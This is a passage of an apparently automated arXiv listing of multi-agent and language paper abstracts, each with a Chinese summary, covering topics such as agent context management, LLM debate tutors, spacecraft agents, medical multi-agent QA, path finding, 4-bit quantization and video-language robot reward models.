【速读】:该论文旨在解决大语言模型(Large Language Models, LLMs)作为长程信息搜索代理时,受限于有限上下文容量所导致的性能瓶颈问题。现有方法通常采用单一固定策略进行上下文管理,难以适应搜索过程中累积上下文有用性和可靠性动态变化的特性。解决方案的关键在于提出AgentSwing框架——一种状态感知的自适应并行上下文管理路由机制:在每个触发点并行扩展多个上下文管理分支,并通过前瞻路由选择最具潜力的延续路径,从而实现对长程任务中搜索效率与最终精度的协同优化。
链接: https://arxiv.org/abs/2603.27490
作者: Zhaopeng Feng,Liangcai Su,Zhen Zhang,Xinyu Wang,Xiaotian Zhang,Xiaobin Wang,Runnan Fang,Qi Zhang,Baixuan Li,Shihao Cai,Rui Ye,Hui Chen,Jiang Yong,Joey Tianyi Zhou,Chenxiong Qian,Pengjun Xie,Bryan Hooi,Zuozhu Liu,Jingren Zhou
机构: Tongyi Lab (通义实验室); Alibaba Group (阿里巴巴集团)
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI); Multiagent Systems (cs.MA)
备注:
Abstract:As large language models (LLMs) evolve into autonomous agents for long-horizon information-seeking, managing finite context capacity has become a critical bottleneck. Existing context management methods typically commit to a single fixed strategy throughout the entire trajectory. Such static designs may work well in some states, but they cannot adapt as the usefulness and reliability of the accumulated context evolve during long-horizon search. To formalize this challenge, we introduce a probabilistic framework that characterizes long-horizon success through two complementary dimensions: search efficiency and terminal precision. Building on this perspective, we propose AgentSwing, a state-aware adaptive parallel context management routing framework. At each trigger point, AgentSwing expands multiple context-managed branches in parallel and uses lookahead routing to select the most promising continuation. Experiments across diverse benchmarks and agent backbones show that AgentSwing consistently outperforms strong static context management methods, often matching or exceeding their performance with up to 3\times fewer interaction turns while also improving the ultimate performance ceiling of long-horizon web agents. Beyond the empirical gains, the proposed probabilistic framework provides a principled lens for analyzing and designing future context management strategies for long-horizon agents.
[MA-15] Heterogeneous Debate Engine: Identity-Grounded Cognitive Architecture for Resilient LLM -Based Ethical Tutoring
【速读】:该论文旨在解决多智能体系统在复杂推理任务中因缺乏约束而导致的语义漂移(semantic drift)和逻辑退化问题,特别是在伦理辅导等需要精确答案的场景下,当前模拟常陷入辩证停滞(dialectical stagnation),表现为智能体产生递归同质或循环论证。解决方案的关键在于提出异质辩论引擎(Heterogeneous Debate Engine, HDE),其核心由两部分构成:一是基于身份锚定的检索增强生成(Identity-Grounded Retrieval-Augmented Generation, ID-RAG),确保教义一致性(doctrinal fidelity);二是启发式心智理论(Heuristic Theory of Mind, Heuristic ToM),用于战略对手建模以提升辩论质量。实验证明,采用对立初始信念(如义务论 vs. 功利主义)可使学生论证复杂度提升一个数量级,验证了ID-RAG与Heuristic ToM作为架构要素对维持高保真(对抗性)教学的有效性。
链接: https://arxiv.org/abs/2603.27404
作者: Jakub Masłowski,Jarosław A. Chudziak
机构: 未知
类目: Artificial Intelligence (cs.AI); Computation and Language (cs.CL); Computers and Society (cs.CY); Human-Computer Interaction (cs.HC); Multiagent Systems (cs.MA)
备注: 15 pages, 3 figures, 4 tables. Accepted at ACIIDS 2026
Abstract:Large Language Models (LLMs) are being increasingly used as autonomous agents in complex reasoning tasks, opening the niche for dialectical interactions. However, Multi-Agent systems implemented with systematically unconstrained systems systematically undergo semantic drift and logical deterioration and thus can hardly be used in providing ethical tutoring where a precise answer is required. Current simulation often tends to degenerate into dialectical stagnation, the agents degenerate into recursive concurrence or circular arguments. A critical challenge remains: how to enforce doctrinal fidelity without suppressing the generative flexibility required for dialectical reasoning? To address this niche, we contribute the Heterogeneous Debate Engine (HDE), a cognitive architecture that combines Identity-Grounded Retrieval-Augmented Generation (ID-RAG) for doctrinal fidelity and Heuristic Theory of Mind for strategic opponent modeling. Our evaluation shows that architectural heterogeneity is a crucial variable to stability: contrary doctrinal initializations (e.g., Deontology vs. Utilitarianism) have increased the Argument Complexity Scores of students by an order of magnitude, over baselines. These findings validate the effectiveness of ID-RAG and Heuristic ToM as architectural requirements in maintaining high-fidelity (adversarial) pedagogy.
[MA-16] GUIDE: Guided Updates for In-context Decision Evolution in LLM -Driven Spacecraft Operations CVPR CVPR2026
【速读】:该论文旨在解决大语言模型(Large Language Models, LLMs)在航天器操作中作为监督代理时,因依赖静态提示(static prompting)而无法在多次执行中持续改进的问题。其解决方案的关键在于提出一种非参数化的策略优化框架——\textscGUIDE,该框架通过演化一个结构化的、状态条件化的自然语言决策规则手册(playbook),实现跨episode的适应性提升,且无需更新模型权重;其中轻量级执行模型负责实时控制,离线反思机制则基于历史轨迹迭代优化决策手册,从而在真实闭环航天交互中实现对结构化决策规则的有效策略搜索。
链接: https://arxiv.org/abs/2603.27306
作者: Alejandro Carrasco,Mariko Storey-Matsutani,Victor Rodriguez-Fernandez,Richard Linares
机构: Massachusetts Institute of Technology (麻省理工学院); Universidad Politecnica de Madrid (马德里理工大学)
类目: Multiagent Systems (cs.MA); Artificial Intelligence (cs.AI); Systems and Control (eess.SY)
备注: Accepted to AI4Space@CVPR Workshop in CVPR 2026
Abstract:Large language models (LLMs) have been proposed as supervisory agents for spacecraft operations, but existing approaches rely on static prompting and do not improve across repeated executions. We introduce \textscGUIDE, a non-parametric policy improvement framework that enables cross-episode adaptation without weight updates by evolving a structured, state-conditioned playbook of natural-language decision rules. A lightweight acting model performs real-time control, while offline reflection updates the playbook from prior trajectories. Evaluated on an adversarial orbital interception task in the Kerbal Space Program Differential Games environment, GUIDE’s evolution consistently outperforms static baselines. Results indicate that context evolution in LLM agents functions as policy search over structured decision rules in real-time closed-loop spacecraft interaction.
[MA-17] EpochX: Building the Infrastructure for an Emergent Agent Civilization
【速读】:该论文试图解决的问题是:随着基础模型使任务执行和工具使用变得日益普及,生成式 AI (Generative AI) 的发展正从单纯提升个体能力转向如何在大规模上高效地分配、验证和激励工作,即如何构建可持续的人机协作生产网络。解决方案的关键在于提出 EpochX——一个以“信用(credits)”为原生机制的市场基础设施,它将人类与智能体视为平等参与者,通过显式的交付流程实现任务分解、执行、验证与接受,并在每次交易中生成可复用的生态系统资产(如技能、工作流、执行轨迹和提炼经验),这些资产具有明确的依赖结构,支持检索、组合与持续迭代优化;同时,信用机制确保了真实计算成本下的经济可行性,通过锁定赏金、预算委托、奖励结算及再利用补偿等机制,推动持久的人机协同价值流动。
链接: https://arxiv.org/abs/2603.27304
作者: Huacan Wang,Chaofa Yuan,Xialie Zhuang,Tu Hu,Shuo Zhang,Jun Han,Shi Wei,Daiqiang Li,Jingping Liu,Kunyi Wang,Zihan Yin,Zhenheng Tang,Andy Wang,Henry Peng Zou,Philip S. Yu,Sen Hu,Qizhen Lan,Ronghao Chen
机构: QuantaAlpha
类目: Artificial Intelligence (cs.AI); Multiagent Systems (cs.MA)
备注:
Abstract:General-purpose technologies reshape economies less by improving individual tools than by enabling new ways to organize production and coordination. We believe AI agents are approaching a similar inflection point: as foundation models make broad task execution and tool use increasingly accessible, the binding constraint shifts from raw capability to how work is delegated, verified, and rewarded at scale. We introduce EpochX, a credits-native marketplace infrastructure for human-agent production networks. EpochX treats humans and agents as peer participants who can post tasks or claim them. Claimed tasks can be decomposed into subtasks and executed through an explicit delivery workflow with verification and acceptance. Crucially, EpochX is designed so that each completed transaction can produce reusable ecosystem assets, including skills, workflows, execution traces, and distilled experience. These assets are stored with explicit dependency structure, enabling retrieval, composition, and cumulative improvement over time. EpochX also introduces a native credit mechanism to make participation economically viable under real compute costs. Credits lock task bounties, budget delegation, settle rewards upon acceptance, and compensate creators when verified assets are reused. By formalizing the end-to-end transaction model together with its asset and incentive layers, EpochX reframes agentic AI as an organizational design problem: building infrastructures where verifiable work leaves persistent, reusable artifacts, and where value flows support durable human-agent collaboration.
[MA-18] MediHive: A Decentralized Agent Collective for Medical Reasoning ALT
【速读】:该论文旨在解决单智能体大语言模型(Large Language Models, LLMs)在处理复杂、跨学科医疗推理任务时因不确定性管理和冲突证据处理能力不足而导致的性能瓶颈问题,同时克服集中式多智能体系统(Multi-agent Systems, MAS)在资源受限环境中存在的可扩展性差、单点故障风险高及角色混淆等缺陷。其解决方案的关键在于提出一种名为MediHive的去中心化多智能体框架(Decentralized Multi-agent System, D-MAS),该框架通过引入共享记忆池与迭代融合机制,使基于LLM的智能体能够自主分配专业角色、执行初始分析、基于条件证据开展辩论以识别分歧,并在多轮本地融合同伴见解以达成共识,从而实现高可靠性与强鲁棒性的医疗问答推理。
链接: https://arxiv.org/abs/2603.27150
作者: Xiaoyang Wang,Christopher C. Yang
机构: 未知
类目: Artificial Intelligence (cs.AI); Multiagent Systems (cs.MA)
备注: Accepted to the 14th IEEE International Conference on Healthcare Informatics (IEEE ICHI 2026)
Abstract:Large language models (LLMs) have revolutionized medical reasoning tasks, yet single-agent systems often falter on complex, interdisciplinary problems requiring robust handling of uncertainty and conflicting evidence. Multi-agent systems (MAS) leveraging LLMs enable collaborative intelligence, but prevailing centralized architectures suffer from scalability bottlenecks, single points of failure, and role confusion in resource-constrained environments. Decentralized MAS (D-MAS) promise enhanced autonomy and resilience via peer-to-peer interactions, but their application to high-stakes healthcare domains remains underexplored. We introduce MediHive, a novel decentralized multi-agent framework for medical question answering that integrates a shared memory pool with iterative fusion mechanisms. MediHive deploys LLM-based agents that autonomously self-assign specialized roles, conduct initial analyses, detect divergences through conditional evidence-based debates, and locally fuse peer insights over multiple rounds to achieve consensus. Empirically, MediHive outperforms single-LLM and centralized baselines on MedQA and PubMedQA datasets, attaining accuracies of 84.3% and 78.4%, respectively. Our work advances scalable, fault-tolerant D-MAS for medical AI, addressing key limitations of centralized designs while demonstrating superior performance in reasoning-intensive tasks.
[MA-19] A Controllability Perspective on Steering Follow-the-Regularized-Leader Learners in Games
【速读】:该论文旨在解决多智能体博弈中控制器如何通过自身策略调整,引导采用连续时间FTRL(Follow-the-regularized-leader)学习动态的其他智能体收敛至目标状态的问题,且不改变原博弈的收益结构。其核心挑战在于:FTRL算法通常使每个智能体独立更新策略,忽略与其他智能体之间的耦合关系,导致全局行为难以被控制。解决方案的关键在于将学习者的动态建模为定义在单纯形或单纯形乘积内部的非线性控制系统,并基于控制理论中的可控制性条件设计控制器策略:对于双人博弈,提出存在完全混合中和策略(fully mixed neutralizing controller strategy)与投影收益映射秩条件的充要可控制性判据;对于多人博弈,则给出两种充分条件——一种依赖于均匀中和机制,另一种结合周期漂移假设与李代数秩条件,从而实现对系统稳态行为的有效调控。
链接: https://arxiv.org/abs/2603.27081
作者: Heling Zhang,Siqi Du,Roy Dong
机构: University of Illinois Urbana-Champaign (伊利诺伊大学厄巴纳-香槟分校)
类目: ystems and Control (eess.SY); Multiagent Systems (cs.MA)
备注: Submitted to IEEE TAC
Abstract:Follow-the-regularized-leader (FTRL) algorithms have become popular in the context of games, providing easy-to-implement methods for each agent, as well as theoretical guarantees that the strategies of all agents will converge to some equilibrium concept (provided that all agents follow the appropriate dynamics). However, with these methods, each agent ignores the coupling in the game, and treats their payoff vectors as exogenously given. In this paper, we take the perspective of one agent (the controller) deciding their mixed strategies in a finite game, while one or more other agents update their mixed strategies according to continuous-time FTRL. Viewing the learners’ dynamics as a nonlinear control system evolving on the relative interior of a simplex or product of simplices, we ask when the controller can steer the learners to a target state, using only its own mixed strategy and without modifying the game’s payoff structure. For the two-player case we provide a necessary and sufficient criterion for controllability based on the existence of a fully mixed neutralizing controller strategy and a rank condition on the projected payoff map. For multi-learner interactions we give two sufficient controllability conditions, one based on uniform neutralization and one based on a periodic-drift hypothesis together with a Lie-algebra rank condition. We illustrate these results on canonical examples such as Rock-Paper-Scissors and a construction related to Brockett’s integrator. Comments: Submitted to IEEE TAC Subjects: Systems and Control (eess.SY); Multiagent Systems (cs.MA) Cite as: arXiv:2603.27081 [eess.SY] (or arXiv:2603.27081v1 [eess.SY] for this version) https://doi.org/10.48550/arXiv.2603.27081 Focus to learn more arXiv-issued DOI via DataCite
[MA-20] On the Reliability Limits of LLM -Based Multi-Agent Planning
【速读】:该论文旨在解决基于大语言模型(Large Language Models, LLMs)的多智能体规划系统在委托决策场景下的可靠性极限问题。其核心挑战在于:当多个智能体通过有限容量的语言接口共享信息并进行协作时,如何量化其决策性能相对于最优集中式贝叶斯决策者的损失。解决方案的关键在于将多智能体架构建模为一个有限无环决策网络,并证明在无外生信号条件下,任何此类委托网络在决策理论上均被具有相同信息访问权限的集中式贝叶斯决策者所支配。进一步地,在共同证据(common-evidence)假设下,优化多智能体有向无环图(multi-agent directed acyclic graphs)等价于在通信预算约束下选择对共享信号的随机实验;同时,作者通过适当评分规则(如对数损失和Brier评分)刻画了通信与信息压缩带来的损失,发现该损失可表示为期望后验发散,分别对应条件互信息和期望平方后验误差。这一理论框架揭示了LLM代理规划系统的根本可靠性边界,并通过控制实验验证了理论预测。
链接: https://arxiv.org/abs/2603.26993
作者: Ruicheng Ao,Siyang Gao,David Simchi-Levi
机构: 1. Massachusetts Institute of Technology (麻省理工学院); 2. University of California, Berkeley (加州大学伯克利分校); 3. MIT Sloan School of Management (麻省理工学院斯隆管理学院); 4. Operations Research Center, MIT (麻省理工学院运筹学中心)
类目: Multiagent Systems (cs.MA); Machine Learning (cs.LG); Optimization and Control (math.OC); Machine Learning (stat.ML)
备注: Technical note
Abstract:This technical note studies the reliability limits of LLM-based multi-agent planning as a delegated decision problem. We model the LLM-based multi-agent architecture as a finite acyclic decision network in which multiple stages process shared model-context information, communicate through language interfaces with limited capacity, and may invoke human review. We show that, without new exogenous signals, any delegated network is decision-theoretically dominated by a centralized Bayes decision maker with access to the same information. In the common-evidence regime, this implies that optimizing over multi-agent directed acyclic graphs under a finite communication budget can be recast as choosing a budget-constrained stochastic experiment on the shared signal. We also characterize the loss induced by communication and information compression. Under proper scoring rules, the gap between the centralized Bayes value and the value after communication admits an expected posterior divergence representation, which reduces to conditional mutual information under logarithmic loss and to expected squared posterior error under the Brier score. These results characterize the fundamental reliability limits of delegated LLM planning. Experiments with LLMs on a controlled problem set further demonstrate these characterizations.
[MA-21] Breaking Exponential Complexity in Games of Ordered Preference: A Tractable Reformulation
【速读】:该论文旨在解决多玩家有序偏好博弈(Games of Ordered Preference, GOOP)中因传统方法导致的可扩展性瓶颈问题。现有方法通过单层重构将字典序约束的纳什均衡必要条件转化为KKT系统,但其原始变量和对偶变量数量随偏好层级数呈指数增长,难以处理大规模问题。解决方案的关键在于提出一种紧凑型重构形式,该形式保留了跨层级的原始最优性结构,从而得到一个规模仅随玩家数和偏好层级数多项式增长的“简化”KKT系统。此简化系统虽为完整KKT系统的松弛形式,但仍为局部GOOP均衡点的必要条件;在二次目标与线性约束情形下,其最优解集与完整KKT系统一致;对于一般光滑非线性情形,该条件可识别所有局部GOOP均衡点,但可能引入虚假解,为此进一步引入二阶充分条件以验证候选点是否为真实均衡,并开发了具有局部二次收敛性的原-对偶内点法用于高效求解。
链接: https://arxiv.org/abs/2603.26950
作者: Dong Ho Lee,Jingqi Li,Lasse Peters,Georgios Bakirtzis,David Fridovich-Keil
机构: 未知
类目: Computer Science and Game Theory (cs.GT); Multiagent Systems (cs.MA)
备注:
Abstract:Games of ordered preference (GOOPs) model multi-player equilibrium problems in which each player maintains a distinct hierarchy of strictly prioritized objectives. Existing approaches solve GOOPs by deriving and enforcing the necessary optimality conditions that characterize lexicographically constrained Nash equilibria through a single-level reformulation. However, the number of primal and dual variables in the resulting KKT system grows exponentially with the number of preference levels, leading to severe scalability challenges. We derive a compact reformulation of these necessary conditions that preserves the essential primal stationarity structure across hierarchy levels, yielding a “reduced” KKT system whose size grows polynomially with both the number of players and the number of preference levels. The reduced system constitutes a relaxation of the complete KKT system, yet it remains a valid necessary condition for local GOOP equilibria. For GOOPs with quadratic objectives and linear constraints, we prove that the primal solution sets of the reduced and complete KKT systems coincide. More generally, for GOOPs with arbitrary (but smooth) nonlinear objectives and constraints, the reduced KKT conditions recover all local GOOP equilibria but may admit spurious non-equilibrium solutions. We introduce a second-order sufficient condition to certify when a candidate point corresponds to a local GOOP equilibrium. We also develop a primal-dual interior-point method for computing a local GOOP equilibrium with local quadratic convergence. The resulting framework enables scalable and efficient computation of GOOP equilibria beyond the tractable range of existing exponentially complex formulations.
[MA-22] oward Evaluation Frameworks for Multi-Agent Scientific AI Systems
【速读】:该论文旨在解决科学领域(多)智能体系统(multi-agent systems)在基准测试(benchmarking)过程中面临的多重挑战,包括推理与检索难以区分、数据/模型污染风险、新颖科研问题缺乏可靠真实标签(ground truth)、工具使用引入的复杂性,以及因知识库持续更新导致的复现困难。其解决方案的关键在于构建抗污染的问题、生成可扩展的任务家族,并通过多轮交互评估来更贴近真实的科学研究实践;同时,作者以量子科学领域的研究人员访谈结果为基础,进一步明确科学家对AI系统的预期交互方式,从而指导评价方法的设计,确保评估体系能够反映实际应用场景中的能力表现。
链接: https://arxiv.org/abs/2603.26718
作者: Marcin Abram
机构: 未知
类目: Computers and Society (cs.CY); Artificial Intelligence (cs.AI); Multiagent Systems (cs.MA); Quantum Physics (quant-ph)
备注: 13 pages, 3 figures
Abstract:We analyze the challenges of benchmarking scientific (multi)-agentic systems, including the difficulty of distinguishing reasoning from retrieval, the risks of data/model contamination, the lack of reliable ground truth for novel research problems, the complications introduced by tool use, and the replication challenges due to the continuously changing/updating knowledge base. We discuss strategies for constructing contamination-resistant problems, generating scalable families of tasks, and the need for evaluating systems through multi-turn interactions that better reflect real scientific practice. As an early feasibility test, we demonstrate how to construct a dataset of novel research ideas to test the out-of-sample performance of our system. We also discuss the results of interviews with several researchers and engineers working in quantum science. Through those interviews, we examine how scientists expect to interact with AI systems and how these expectations should shape evaluation methods.
[MA-23] Agent ic AI for Human Resources: LLM -Driven Candidate Assessment EACL2026
【速读】:该论文旨在解决传统招聘系统(如ATS)在候选人评估中依赖关键词匹配或浅层评分、缺乏透明度与专业性的问题。其核心挑战在于如何实现基于角色的精细化、可解释的评估,并高效生成高质量的候选人群体排名。解决方案的关键在于提出一个模块化且可解释的框架,利用大语言模型(Large Language Models, LLMs)整合岗位描述、简历、面试记录和HR反馈等多源信息,生成结构化的评估报告;并创新性地引入LLM驱动的主动式列表锦标赛机制(LLM-Driven Active Listwise Tournament),通过小规模候选子集的列表偏好排序(listwise preference modeling)结合Plackett-Luce模型聚合,实现全局一致且样本高效的排名,显著优于传统的成对比较或独立打分方式,为人才选拔提供了可审计、可追溯的自动化决策支持。
链接: https://arxiv.org/abs/2603.26710
作者: Kamer Ali Yuksel,Abdul Basit Anees,Ashraf Elneima,Sanjika Hewavitharana,Mohamed Al-Badrashiny,Hassan Sawaf
机构: 未知
类目: Information Retrieval (cs.IR); Artificial Intelligence (cs.AI); Computation and Language (cs.CL); Multiagent Systems (cs.MA)
备注: Published in 19th Conference of the European Chapter of the Association for Computational Linguistics (EACL 2026)
Abstract:In this work, we present a modular and interpretable framework that uses Large Language Models (LLMs) to automate candidate assessment in recruitment. The system integrates diverse sources, including job descriptions, CVs, interview transcripts, and HR feedback; to generate structured evaluation reports that mirror expert judgment. Unlike traditional ATS tools that rely on keyword matching or shallow scoring, our approach employs role-specific, LLM-generated rubrics and a multi-agent architecture to perform fine-grained, criteria-driven evaluations. The framework outputs detailed assessment reports, candidate comparisons, and ranked recommendations that are transparent, auditable, and suitable for real-world hiring workflows. Beyond rubric-based analysis, we introduce an LLM-Driven Active Listwise Tournament mechanism for candidate ranking. Instead of noisy pairwise comparisons or inconsistent independent scoring, the LLM ranks small candidate subsets (mini-tournaments), and these listwise permutations are aggregated using a Plackett-Luce model. An active-learning loop selects the most informative subsets, producing globally coherent and sample-efficient rankings. This adaptation of listwise LLM preference modeling (previously explored in financial asset ranking) provides a principled and highly interpretable methodology for large-scale candidate ranking in talent acquisition. Comments: Published in 19th Conference of the European Chapter of the Association for Computational Linguistics (EACL 2026) Subjects: Information Retrieval (cs.IR); Artificial Intelligence (cs.AI); Computation and Language (cs.CL); Multiagent Systems (cs.MA) Cite as: arXiv:2603.26710 [cs.IR] (or arXiv:2603.26710v1 [cs.IR] for this version) https://doi.org/10.48550/arXiv.2603.26710 Focus to learn more arXiv-issued DOI via DataCite (pending registration) Journalreference: 19th Conference of the European Chapter of the Association for Computational Linguistics (EACL 2026), Rabat, Morocco
[MA-24] Decoupling Geometric Planning and Execution in Scalable Multi-Agent Path Finding
【速读】:该论文旨在解决多智能体路径规划(Multi-Agent Path Finding, MAPF)中因中央冲突消解和时间扩展模型导致的可扩展性瓶颈问题,尤其在大规模或高密度场景下性能受限。解决方案的关键在于提出一种混合优先级框架:第一阶段通过几何冲突预判(Geometric Conflict Preemption, GCP)在原始图上使用A*算法顺序规划路径,并通过对高优先级路径占用顶点的边进行成本膨胀来诱导空间绕行,从而避免显式的时间推理;第二阶段采用去中心化的局部控制器(Decentralized Local Controller, DLC),基于顶点FIFO授权队列执行路径,在必要时插入等待动作以避免顶点和边交换冲突。该方法实现了近线性的运行时间增长并保证了高成功率,且在瓶颈密集的地图上显著减少了同步引发的等待,提升了总成本(Sum-of-Costs, SOC)性能。
链接: https://arxiv.org/abs/2603.26684
作者: Fernando Salanova,Cristian Mahulea,Eduardo Montijano
机构: 未知
类目: Multiagent Systems (cs.MA); Robotics (cs.RO)
备注: 6 pages, 3 figures WODES submission
Abstract:Multi-Agent Path Finding (MAPF) requires collision-free trajectories for multiple agents on a shared graph, often with the objective of minimizing the sum-of-costs (SOC). Many optimal and bounded-suboptimal solvers rely on time-expanded models and centralized conflict resolution, which limits scalability in large or dense instances. We propose a hybrid prioritized framework that separates geometric planning from execution-time conflict resolution. In the first stage, Geometric Conflict Preemption (GCP) plans agents sequentially with A* on the original graph while inflating costs for transitions entering vertices used by higher-priority paths, encouraging spatial detours without explicit time reasoning. In the second stage, a Decentralized Local Controller (DLC) executes the geometric paths using per-vertex FIFO authorization queues and inserts wait actions only when required to avoid vertex and edge-swap conflicts. Experiments on standard benchmark maps with up to 1000 agents show that the method scales with an empirically near-linear runtime trend and attains a 100% success rate on instances satisfying the geometric feasibility assumption. On bottleneck-heavy maps, GCP reduces synchronization-induced waiting and often improves SOC on bottleneck-heavy maps
自然语言处理
[NLP-0] Adaptive Block-Scaled Data Types
【速读】: 该论文旨在解决NVFP4(NVIDIA Floating Point 4)在量化大语言模型时因误差分布不均导致的性能瓶颈问题,尤其是每16个值为一组时,靠近最大值的数值会引入显著的量化误差。其解决方案的关键在于设计一种自适应块缩放数据类型——IF4(Int/Float 4),该类型对每组16个值动态选择使用FP4或INT4表示,并通过E4M3缩放因子进行统一处理;通过复用NVFP4中未使用的缩放因子符号位来标记所选的数据类型,从而在保持硬件兼容性的同时提升量化精度。该方法在量化训练和后训练量化任务中均表现出优于现有4-bit格式的性能,且可高效集成至下一代硬件加速器中。
链接: https://arxiv.org/abs/2603.28765
作者: Jack Cook,Hyemin S. Lee,Kathryn Le,Junxian Guo,Giovanni Traverso,Anantha P. Chandrakasan,Song Han
机构: Massachusetts Institute of Technology (麻省理工学院); NVIDIA
类目: Computation and Language (cs.CL)
备注: 19 pages, 9 figures
Abstract:NVFP4 has grown increasingly popular as a 4-bit format for quantizing large language models due to its hardware support and its ability to retain useful information with relatively few bits per parameter. However, the format is not without limitations: recent work has shown that NVFP4 suffers from its error distribution, resulting in large amounts of quantization error on near-maximal values in each group of 16 values. In this work, we leverage this insight to design new Adaptive Block-Scaled Data Types that can adapt to the distribution of their input values. For four-bit quantization, our proposed IF4 (Int/Float 4) data type selects between FP4 and INT4 representations for each group of 16 values, which are then scaled by an E4M3 scale factor as is done with NVFP4. The selected data type is denoted using the scale factor’s sign bit, which is currently unused in NVFP4, and we apply the same insight to design formats for other bit-widths, including IF3 and IF6. When used to quantize language models, we find that IF4 outperforms existing 4-bit block-scaled formats, achieving lower loss during quantized training and achieving higher accuracy on many tasks in post-training quantization. We additionally design and evaluate an IF4 Multiply-Accumulate (MAC) unit to demonstrate that IF4 can be implemented efficiently in next-generation hardware accelerators. Our code is available at this https URL.
[NLP-1] SOLE-R1: Video-Language Reasoning as the Sole Reward for On-Robot Reinforcement Learning
【速读】: 该论文旨在解决当前视觉语言模型(Vision-Language Models, VLMs)在强化学习(Reinforcement Learning, RL)中作为奖励信号时,因部分可观测性和分布偏移导致的鲁棒性不足问题,即模型易被策略利用感知错误而非真正完成任务。解决方案的关键在于提出一种名为SOLE-R1(Self-Observing LEarner)的视频-语言推理模型,该模型通过每帧进行时空链式思维(spatiotemporal chain-of-thought, CoT)推理,直接生成稠密的任务进展估计值作为奖励信号,从而实现无需真实奖励、成功指标或任务特定调优的零样本在线强化学习。其核心创新包括:大规模视频轨迹与推理合成数据集、融合空间与多帧时序推理的基础能力,以及结合监督微调与可验证奖励强化学习的混合训练框架。
链接: https://arxiv.org/abs/2603.28730
作者: Philip Schroeder,Thomas Weng,Karl Schmeckpeper,Eric Rosen,Stephen Hart,Ondrej Biza
机构: 未知
类目: Robotics (cs.RO); Computation and Language (cs.CL); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Vision-language models (VLMs) have shown impressive capabilities across diverse tasks, motivating efforts to leverage these models to supervise robot learning. However, when used as evaluators in reinforcement learning (RL), today’s strongest models often fail under partial observability and distribution shift, enabling policies to exploit perceptual errors rather than solve the task. To address this limitation, we introduce SOLE-R1 (Self-Observing LEarner), a video-language reasoning model explicitly designed to serve as the sole reward signal for online RL. Given only raw video observations and a natural-language goal, SOLE-R1 performs per-timestep spatiotemporal chain-of-thought (CoT) reasoning and produces dense estimates of task progress that can be used directly as rewards. To train SOLE-R1, we develop a large-scale video trajectory and reasoning synthesis pipeline that generates temporally grounded CoT traces aligned with continuous progress supervision. This data is combined with foundational spatial and multi-frame temporal reasoning, and used to train the model with a hybrid framework that couples supervised fine-tuning with RL from verifiable rewards. Across four different simulation environments and a real-robot setting, SOLE-R1 enables zero-shot online RL from random initialization: robots learn previously unseen manipulation tasks without ground-truth rewards, success indicators, demonstrations, or task-specific tuning. SOLE-R1 succeeds on 24 unseen tasks and substantially outperforms strong vision-language rewarders, including GPT-5 and Gemini-3-Pro, while exhibiting markedly greater robustness to reward hacking.
[NLP-2] EpiScreen: Early Epilepsy Detection from Electronic Health Records with Large Language Models
【速读】: 该论文旨在解决癫痫(epilepsy)与心因性非癫痫发作(psychogenic non-epileptic seizures, PNES)临床表现相似但诊疗策略迥异所导致的误诊问题,此类误诊常引发诊断延迟、不当治疗及患者不良预后。解决方案的关键在于开发一种名为EpiScreen的低成本、高效筛查工具,其核心是利用电子健康记录中常规收集的临床文书,通过在标注文本数据上微调大语言模型(large language models),实现对癫痫的早期识别。该方法在MIMIC-IV数据集上达到0.875的AUC,在明尼苏达大学私有队列中更是高达0.980,并在医生与AI协同决策场景下使神经科专家性能提升最高达10.9%,从而为资源受限地区提供可扩展的早期筛查方案,缩短诊断周期并减少不必要的干预。
链接: https://arxiv.org/abs/2603.28698
作者: Shuang Zhou,Kai Yu,Zaifu Zhan,Huixue Zhou,Min Zeng,Feng Xie,Zhiyi Sha,Rui Zhang
机构: 未知
类目: Computation and Language (cs.CL)
备注: 24 pages, 5 figures, 4 tables
Abstract:Epilepsy and psychogenic non-epileptic seizures often present with similar seizure-like manifestations but require fundamentally different management strategies. Misdiagnosis is common and can lead to prolonged diagnostic delays, unnecessary treatments, and substantial patient morbidity. Although prolonged video-electroencephalography is the diagnostic gold standard, its high cost and limited accessibility hinder timely diagnosis. Here, we developed a low-cost, effective approach, EpiScreen, for early epilepsy detection by utilizing routinely collected clinical notes from electronic health records. Through fine-tuning large language models on labeled notes, EpiScreen achieved an AUC of up to 0.875 on the MIMIC-IV dataset and 0.980 on a private cohort of the University of Minnesota. In a clinician-AI collaboration setting, EpiScreen-assisted neurologists outperformed unaided experts by up to 10.9%. Overall, this study demonstrates that EpiScreen supports early epilepsy detection, facilitating timely and cost-effective screening that may reduce diagnostic delays and avoid unnecessary interventions, particularly in resource-limited regions.
[NLP-3] ResAdapt: Adaptive Resolution for Efficient Multimodal Reasoning
【速读】: 该论文旨在解决多模态大语言模型(Multimodal Large Language Models, MLLMs)在处理高时空分辨率视频时面临的视觉token膨胀问题,即在保持高空间分辨率和长时序上下文的同时难以维持计算效率。其核心挑战在于输入编码器接收的像素量过大,而非后续表示压缩方式不足。解决方案的关键是提出ResAdapt——一个输入侧自适应框架,通过引入轻量级Allocator模块,在编码前动态分配每帧的视觉预算(visual budget),从而优化资源分配。该框架将分配策略建模为上下文相关的Bandit问题,并采用成本感知策略优化(Cost-Aware Policy Optimization, CAPO)方法,从稀疏的回放反馈中学习稳定且高效的准确率-成本权衡信号。实验表明,ResAdapt可在相同视觉预算下支持最多16倍帧数,同时在推理密集型任务中提升超过15%性能,显著逼近效率-准确率前沿。
链接: https://arxiv.org/abs/2603.28610
作者: Huanxuan Liao,Zhongtao Jiang,Yupu Hao,Yuqiao Tan,Shizhu He,Jun Zhao,Kun Xu,Kang Liu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注: work in progress
Abstract:Multimodal Large Language Models (MLLMs) achieve stronger visual understanding by scaling input fidelity, yet the resulting visual token growth makes jointly sustaining high spatial resolution and long temporal context prohibitive. We argue that the bottleneck lies not in how post-encoding representations are compressed but in the volume of pixels the encoder receives, and address it with ResAdapt, an Input-side adaptation framework that learns how much visual budget each frame should receive before encoding. ResAdapt couples a lightweight Allocator with an unchanged MLLM backbone, so the backbone retains its native visual-token interface while receiving an operator-transformed input. We formulate allocation as a contextual bandit and train the Allocator with Cost-Aware Policy Optimization (CAPO), which converts sparse rollout feedback into a stable accuracy-cost learning signal. Across budget-controlled video QA, temporal grounding, and image reasoning tasks, ResAdapt improves low-budget operating points and often lies on or near the efficiency-accuracy frontier, with the clearest gains on reasoning-intensive benchmarks under aggressive compression. Notably, ResAdapt supports up to 16x more frames at the same visual budget while delivering over 15% performance gain. Code is 